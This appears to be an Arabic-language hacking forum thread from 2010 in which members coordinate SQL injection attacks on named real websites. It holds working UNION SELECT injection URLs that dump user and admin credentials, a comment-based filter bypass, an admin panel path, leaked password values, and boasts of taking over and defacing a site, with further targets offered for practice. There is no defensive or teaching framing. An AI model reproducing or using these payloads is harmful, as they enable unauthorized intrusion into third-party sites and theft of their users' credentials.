:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)
-   -   العدد (3) من غرفة الحقن (http://www.vbspiders.com/vb/t39268.html)

aircrack -ng 12-14-2010 09:34 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة Victors (المشاركة 267973)
الحقنة

كود:

http://www.thecompletepianist.com/material.php?id=-18 UNION SELECT 1,2,group_concat(email,char(58),password),4,5,6,7,8 from users --
الايميل ~> لانة يتم الدخول عن طريق الايميل والباسوورد :)

اهلا بالزعيم
تسلم عمو
ع فكرة فيه موقع حقنته وهو موقع دعارة وافلام استغفر الله
راسلني على الخاص

aircrack -ng 12-14-2010 09:53 PM

اوكي شباب راح اعطيكم الموقع

لاتضحكو علي سويت عليه شرح ونسيته اني حقنت موقع وهلا فتحت الدوكمو لقيته هههههههههههههههه

http://www.avmaniacs.com/review.php?id=1472

مسار اللوحة وبروك عليكم الاختراق مسبقا

http://www.avmaniacs.com/admin/admin-add.php

aircrack -ng 12-14-2010 10:21 PM

ارفعو عليه شل لانو فيه مواقع حلوة على نفس السيرفر
في انتظاركم

aircrack -ng 12-14-2010 10:53 PM

وينكم شباب والله اشتقتلكم
شوفو مع الموقع وادعسوه ولي رجعة باذن الله بمواقع اخرى مع لوحات تحكم عن قريب
اخوكم عبد الصمد

Dr.Unkn0wn 12-14-2010 11:00 PM

كيف اتخطى خطا 403

aircrack -ng 12-14-2010 11:17 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة MR.DZ (المشاركة 268021)
كيف اتخطى خطا 403

ممممممممممممممممممممممممم واش راح نقولك خو
تخطي الفوربدن ب
كود:

/*!
و
*/

لما تنزل الحقنة منك او من الاعضاء راح اشرحلك بالتفصيل الممل عن تخطي الفوربدن
اصبر علي شوي اخي

Dr.Unkn0wn 12-14-2010 11:49 PM

هذا ما وصلت له للاسف و من يقدر يحمل الدرس السابع لفولكانو و يعيد يرفعه لي اكون ممنون له و الذي لديه برنامج تخمينات يحطه جزاه الله خير
حقني لحد تعلمي
http://www.avmaniacs.com/review.php?...23,24,25,26,27 --

إسلام العالم 12-15-2010 12:01 AM

اليوزر : 1

الباس (مشفر MD5 ) :
82b1530be6c3a060294116bbb6b1c3e4
و ما قدرت فكه...

aircrack -ng 12-15-2010 12:02 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة MR.DZ (المشاركة 268046)
هذا ما وصلت له للاسف و من يقدر يحمل الدرس السابع لفولكانو و يعيد يرفعه لي اكون ممنون له و الذي لديه برنامج تخمينات يحطه جزاه الله خير
حقني لحد تعلمي
http://www.avmaniacs.com/review.php?...23,24,25,26,27 --

مبدع اخي بس لاتنسى انو الموقع هذا لازم تح -- الناقصين
تفضل حبيبي
كود:


http://www.avmaniacs.com/review.php?id=-1472+UNION+/*!SELECT*/+version%28%29,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

كمل الحقنة اخي

aircrack -ng 12-15-2010 12:07 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة إسلام العالم (المشاركة 268053)
اليوزر : 1

الباس (مشفر MD5 ) :
82b1530be6c3a060294116bbb6b1c3e4
و ما قدرت فكه...

تسلم اخي حقنة كاملة
الاميل +رقم اعضوية+الباس

يعطيك العافية اخي واصل

إسلام العالم 12-15-2010 12:47 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة عبد الصمد (المشاركة 267988)
اوكي شباب راح اعطيكم الموقع

لاتضحكو علي سويت عليه شرح ونسيته اني حقنت موقع وهلا فتحت الدوكمو لقيته هههههههههههههههه

http://www.avmaniacs.com/review.php?id=1472

مسار اللوحة وبروك عليكم الاختراق مسبقا

http://www.avmaniacs.com/admin/admin-add.php


هل جربت الموقع قبل؟؟؟؟لأني فليته تقلاية و هذه النتيجة :

الحقنة هكذا :

اقتباس:

http://www.avmaniacs.com/review.php?...re+column_name +like+char(37, 112, 97, 115, 115, 37)--

الجداول :
password>avmaniac_access2l>AdminAccounts

AdminAccountsID>avmaniac_access2l>AdminAccounts

االيوزر : 1

الباس : waltde51gn

حاولت الدخول للوحة ولكن لم يدخل أظن أن الباس مشفر....

darkman.dz 12-15-2010 01:06 AM

السلام عليكم ورحمة الله تعالى وبركاته
كيف الحال شباب

aircrack -ng 12-15-2010 01:07 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة إسلام العالم (المشاركة 268084)

هل جربت الموقع قبل؟؟؟؟لأني فليته تقلاية و هذه النتيجة :

الحقنة هكذا :



الجداول :
password>avmaniac_access2l>AdminAccounts

AdminAccountsID>avmaniac_access2l>AdminAccounts

االيوزر : 1

الباس : waltde51gn

حاولت الدخول للوحة ولكن لم يدخل أظن أن الباس مشفر....

شوف اخي
id هي رقم العضوية مش هي اليوزر
شوف اخي نفرض مثلا اننا حقنا موقع وطلع معانا اليوزر
مثلا راح نلقى
user:id:system
هنا id هي لمعرفة رقم العضوية ودائما رقم العضوية يكون 1
مثلا نفرض اننا بدنا جدول اليوزر الي راح يطلعلنا اسم الادمن
راح نلقى مثلا
user:username:sest
هنا username هي الي راح طلعلنا اسم الادمن
مثلا احنا طلعو معانا كذا
user:id:sese
user:username:ses
user:password:sese

ومثلا احنا حطينا حقنة وطلو معانا اعضاء كثير كيف راح نعرف الادمن فيهم هنا لازم نستعمل id
راح يكون الاستغلال كذا

concat(username,0x3a,id,0x3a,password)5,6,7+from+u ser
هنا
username راح يطلعلنا الاسماء
id راح يطلعلنا رقم العضويات
password راح يطلعلنا باسوردات

يعني يوزر وباس الادمن دائما نلاقيهم هيك مثلا
admin:1:123456
اتمنى تكون وصلت الفكرة
اخوك عبد الصمد

aircrack -ng 12-15-2010 01:19 AM

ع فكرة اخي اسلام
الباس مش مشفر وانا حقنته ودخلت اللوحة وتجولت فيها وعملت عليها شرح
اخي دائما لما نحب نطلع الادمن نستعمل مثل مافهمتك
مثلا هيك
admin:1:123456
فهمت علي اخي
انت تحقن جيدا واصل اخي
لك مني اجمل تحية

aircrack -ng 12-15-2010 01:23 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة _darkman_ (المشاركة 268104)
السلام عليكم ورحمة الله تعالى وبركاته
كيف الحال شباب

هلا مشرفنا الغالي منور الغرفة

إسلام العالم 12-15-2010 01:24 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة عبد الصمد (المشاركة 268105)
شوف اخي
id هي رقم العضوية مش هي اليوزر
شوف اخي نفرض مثلا اننا حقنا موقع وطلع معانا اليوزر
مثلا راح نلقى
user:id:system
هنا id هي لمعرفة رقم العضوية ودائما رقم العضوية يكون 1
مثلا نفرض اننا بدنا جدول اليوزر الي راح يطلعلنا اسم الادمن
راح نلقى مثلا
user:username:sest
هنا username هي الي راح طلعلنا اسم الادمن
مثلا احنا طلعو معانا كذا
user:id:sese
user:username:ses
user:password:sese

ومثلا احنا حطينا حقنة وطلو معانا اعضاء كثير كيف راح نعرف الادمن فيهم هنا لازم نستعمل id
راح يكون الاستغلال كذا

concat(username,0x3a,id,0x3a,password)5,6,7+from+u ser
هنا
username راح يطلعلنا الاسماء
id راح يطلعلنا رقم العضويات
password راح يطلعلنا باسوردات

يعني يوزر وباس الادمن دائما نلاقيهم هيك مثلا
admin:1:123456
اتمنى تكون وصلت الفكرة
اخوك عبد الصمد


أنا معك بس الموقع حاولت ما ظهر معي إلا هذا الجدول؟؟؟؟؟؟

darkman.dz 12-15-2010 01:29 AM

شكرا أخي عبد الصمد
الغرفة منورة بوجودك
هههههههههههههههههه
هاتولي هاذ الهدف المستعصي خليني أحاول معاه
هههههههههههههه

aircrack -ng 12-15-2010 01:34 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة إسلام العالم (المشاركة 268119)
أنا معك بس الموقع حاولت ما ظهر معي إلا هذا الجدول؟؟؟؟؟؟

استعمل الامر limit
شوف شو راح يطلع معاك
AdminAccounts:login:avmaniac_access2l

login

شفت شو انت نسيت نسيت امر مهم وهو limit
راح اعطيك بطاقة صفراء اذا نسيت هالامر في المرة الجاية ههههههههههه
عم امزح معاك اخي

aircrack -ng 12-15-2010 01:40 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة _darkman_ (المشاركة 268124)
شكرا أخي عبد الصمد
الغرفة منورة بوجودك
هههههههههههههههههه
هاتولي هاذ الهدف المستعصي خليني أحاول معاه
هههههههههههههه

تسلم اخي ومشرفنا الغالي
ع فكرة هالموقع كبير ومشهور جدا :a04:

الله يرحمو هالموقع ههههههههههههههههه:00001793[1]:
طاح في ايدينا هههههههههههههه

الادمن راح يندم انو فتح موقع هههههههههه

darkman.dz 12-15-2010 01:47 AM

الحقنة الكاملة
كود:

http://www.avmaniacs.com/review.php?id=-696 /*!UNION*//*!SELECT*/ unhex(hex(group_CONCAT(AdminAccountsID,0x3a,login,0x3a,password))),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+AdminAccounts--
خلينا نحط الإندكس تاعنا
هههههههههههههههههههههههههههههههه
أو علم الجزائر مشرق وإلى العروبة ينتسب
ههههههههههههههههههههههههههههههههههههههههههsmilies1 7

Dr.Unkn0wn 12-15-2010 01:49 AM

شباب انا ماني متعلم احقن اصدار القاعدة 5 ارجو انكم ترفعو لي الدرس السابع من فولكانو على الميديافاير حتى اتابع الدورة

aircrack -ng 12-15-2010 01:49 AM

تم دعسو http://www.avmaniacs.com/ من قبل اخي فيكتور
معليش القادم احلى
بكرى ان شاء الله راح انزل مواقع كثيرة

darkman.dz 12-15-2010 01:56 AM

ألف مبروك للداعس

Dr.Unkn0wn 12-15-2010 01:58 AM

سبقوكم في الدعس ههههههه

Dr.Unkn0wn 12-15-2010 02:00 AM

في اخرين ؟ اعطونا مواقع باي بالات

aircrack -ng 12-15-2010 02:09 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة _darkman_ (المشاركة 268145)
ألف مبروك للداعس

القادم احلى مشرفنا الغالي
وان شاء الله راح انزل مواقع كثيرة عن قريب وراح تكون مواقع كبيرة

والله احلى مشرف واخ ربنا يسعدك اخي

لي رجعى غدا بحول الله

Dr.Unkn0wn 12-15-2010 02:11 AM

وين رايحين؟ تنامو ؟

aircrack -ng 12-15-2010 02:20 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة MR.DZ (المشاركة 268157)
وين رايحين؟ تنامو ؟

هههههههههههههههه باي باي غدوا ان شاء الله
ع فكرة راس اخي فولكانو وقله يرفعلك الدرس الي ماقدرت تحمله

غدا اخي الكريم

Dr.Unkn0wn 12-15-2010 02:25 AM

ضع موقع و اذهب خليني اتدرب عليه

Victors 12-15-2010 02:37 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة MR.DZ (المشاركة 268164)
ضع موقع و اذهب خليني اتدرب عليه


موقع ع السريع لقيتة قبل شوي

http://www.myhomedeco.com/list.php?cat=11&sub=13

ما جربت احقنه لانو الوقت متأخر وعندي دوام بكره

حاولوا معه وشوفوا

:a12:

تصبحوا على خير :)

Dr.Unkn0wn 12-15-2010 05:37 AM

اول حقنة لي
http://www.thecompletepianist.com/material.php?id=-18 UNION SELECT 1,2,concat(id,0x3a,password),4,5,6,7,8+from+users--

إسلام العالم 12-15-2010 03:01 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة Victors (المشاركة 268168)
موقع ع السريع لقيتة قبل شوي

http://www.myhomedeco.com/list.php?cat=11&sub=13

ما جربت احقنه لانو الوقت متأخر وعندي دوام بكره

حاولوا معه وشوفوا

:a12:

تصبحوا على خير :)

توصلت في الحقنة إلى هنا

و لكن لم يظهر معي العامود المصاب حاولت و لا زلت أحاول
smilies16

إسلام العالم 12-15-2010 03:40 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة MR.DZ (المشاركة 268207)
اول حقنة لي
http://www.thecompletepianist.com/material.php?id=-18 UNION SELECT 1,2,concat(id,0x3a,password),4,5,6,7,8+from+users--

شغلك صحيح أخي و لكن ناقص إسم الأدمن

الحقنة هكذا

اقتباس:

http://www.thecompletepianist.com/material.php?id=-18 UNION SELECT 1,2,3,4,concat(name,0x3e,email,0x3e,password),6,7, 8+from+users

Dr.Unkn0wn 12-15-2010 04:19 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة إسلام العالم (المشاركة 268276)
توصلت في الحقنة إلى هنا



و لكن لم يظهر معي العامود المصاب حاولت و لا زلت أحاول
smilies16

على فكرة اظن ان به نقود :Great: smilies17
n028

Dr.Unkn0wn 12-15-2010 06:57 PM

شباب في من استطاع حقن الموقع ؟

Dr.Unkn0wn 12-15-2010 07:02 PM

وينكم ؟

agentsimo 12-15-2010 07:35 PM

السلام عليكم
فين هو الموقع لي مقدرتوش تحقنوه
راح احاول معه

Dr.Unkn0wn 12-15-2010 07:47 PM

هذا هو
http://www.myhomedeco.com/list.php?cat=11&sub=13

agentsimo 12-15-2010 08:02 PM

الحفن جارييييي
+
هل وجدت صفحة الادمين

Dr.Unkn0wn 12-15-2010 08:09 PM

ارجو انك تحط كيفية الحقن


الساعة الآن 02:05 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0